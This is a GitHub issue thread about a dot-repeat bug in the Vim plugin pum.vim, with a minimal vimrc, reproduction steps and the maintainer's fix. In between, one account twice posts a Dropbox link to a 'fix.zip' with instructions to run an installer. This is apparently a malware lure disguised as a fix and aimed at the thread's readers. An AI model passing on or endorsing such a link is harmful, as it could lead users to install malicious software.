### ISSUE TITLE
Dot-repeat does not work when the cursor is not at EOL

### ISSUE THREAD

**Issue by cohama** [Shougo/pum.vim#61]
**Warning: I will close the issue without the minimal init.vim and the
reproduction instructions.**

# Problems summary
If the cursor is not at the end of line, dot-repeat does not work when completing with pum.vim (via ddc.vim).

## Expected
Regardless of the cursor position, dot-repeat should work.

## Environment Information (Required!)

- pum.vim version(SHA1): d9995c8f134ee84322d3dc6f12ea7f061dcacf3f

- OS:

- neovim: `NVIM v0.11.0-dev-632+g33464189bc`
- Vim: `VIM - Vi IMproved 9.1 (2024 Jan 02, compiled Aug 11 2024 20:40:17)
Included patches: 1-672
Compiled by Arch Linux
Huge version without GUI.`

## Provide a minimal init.vim/vimrc without plugin managers (Required!)

```vim
let root_path = fnamemodify(expand("<sfile>"), ":p:h")
let &runtimepath .= ',' . root_path . '/denops.vim'
let &runtimepath .= ',' . root_path . '/pum.vim'
let &runtimepath .= ',' . root_path . '/ddc-ui-pum'
let &runtimepath .= ',' . root_path . '/ddc-source-around'
let &runtimepath .= ',' . root_path . '/ddc-filter-matcher_head'
let &runtimepath .= ',' . root_path . '/ddc.vim'
call ddc#custom#patch_global(#{
\   ui: 'pum',
\   sourceOptions: #{
\     _: #{
\       matchers: ['matcher_head'],
\     },
\   },
\   sources: ['around'],
\ })
call ddc#enable()
inoremap <C-n> <Cmd>call pum#map#insert_relative(+1)<CR>
inoremap <C-p> <Cmd>call pum#map#insert_relative(-1)<CR>
```

## How to reproduce the problem from neovim/Vim startup (Required!)

1. Open a file.
2. Input `ifoo\nfor ;<Esc>`. The buffer will look like bellow. (`|` represents the cursor)

```
foo
for |;
```
   
3. Input `ifo<C-n><Esc>`. (Complete `foo`)
4. Input `$.`. `foo` is expected but actually only `fo` is input

**Comment by cohama** [comment]
I found suspicious code in `autoload/pum/map.vim`. https://github.com/Shougo/pum.vim/blob/main/autoload/pum/map.vim#L333
When `next_input` is not empty, `setline` function is used. This may breaks dot-repeat.

Is this an expected behavior?

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Shougo** [comment]
Hm...

> I found suspicious code in autoload/pum/map.vim. https://github.com/Shougo/pum.vim/blob/main/autoload/pum/map.vim#L333
> When next_input is not empty, setline function is used. This may breaks dot-repeat.

> Is this an expected behavior?

The code is added to support `confirm_suffix` feature.

https://github.com/Shougo/pum.vim/commit/71c23d7e319faa78a338a03b1ae3fc839392859a

**Comment by Shougo** [comment]
Fixed.

**Comment by cohama** [comment]
Confirmed. Thank!
